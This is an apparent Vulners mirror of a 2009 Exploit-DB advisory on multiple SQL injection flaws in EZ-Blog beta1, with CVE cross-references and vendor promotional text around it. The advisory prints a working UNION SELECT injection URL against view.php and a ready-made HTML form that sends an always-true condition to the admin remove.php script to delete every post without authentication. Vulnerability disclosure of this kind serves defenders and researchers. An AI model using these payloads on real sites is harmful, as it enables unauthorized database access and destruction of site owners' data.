Lucene search
+L

EZ-Blog beta1 - Delete All Posts / SQL Injection

🗓️ 02 Mar 2009 00:00:00Reported by Salvatore FrestaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

EZ-Blog beta1 - Delete All Posts / SQL Injectio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-4801
2 Mar 200900:00
circl
Circl
CVE-2009-4805
2 Mar 200900:00
circl
CVE
CVE-2009-4801
23 Apr 201014:00
cve
CVE
CVE-2009-4805
23 Apr 201014:00
cve
Cvelist
CVE-2009-4801
23 Apr 201014:00
cvelist
Cvelist
CVE-2009-4805
23 Apr 201014:00
cvelist
EUVD
EUVD-2009-4764
7 Oct 202500:30
euvd
EUVD
EUVD-2009-4768
7 Oct 202500:30
euvd
NVD
CVE-2009-4801
23 Apr 201014:30
nvd
NVD
CVE-2009-4805
23 Apr 201014:30
nvd
Rows per page
*******   Salvatore "drosophila" Fresta   *******


Application:      EZ-Blog
                         http://sourceforge.net/projects/ez-blog/
Version:            Beta 1
Bug:                 * Multiple SQL Injection
Exploitation:     Remote
Date:                1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author:             Salvatore "drosophila" Fresta
                         e-mail: [email protected]


*************************************************

- BUGS

SQL Injection:

	Requisites: magic_quotes_gpc = off

	This is a crazy application because it not
	require authentication for posting, deleting,
	etc. and it is entirely vulnerable to SQL
	Injection, as follows:

	http://site/path/public/view.php?storyid=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,9,10%23

	There aren't hight reserved information on the
	database, but it is possible to cause inconvenience.
	The following injection allow to delete all
	posts:

	<form action="http://site/path/admin/remove.php" method="POST">
	    <input type="hidden" name="kill" value="1'or'1'='1">
	    <input type="hidden" name="confirm" value="1">
	    <input type="hidden" name="rm" value="true">
	    <input type="submit" value="Exploit">
	</form>

# milw0rm.com [2009-03-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Feb 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02252
32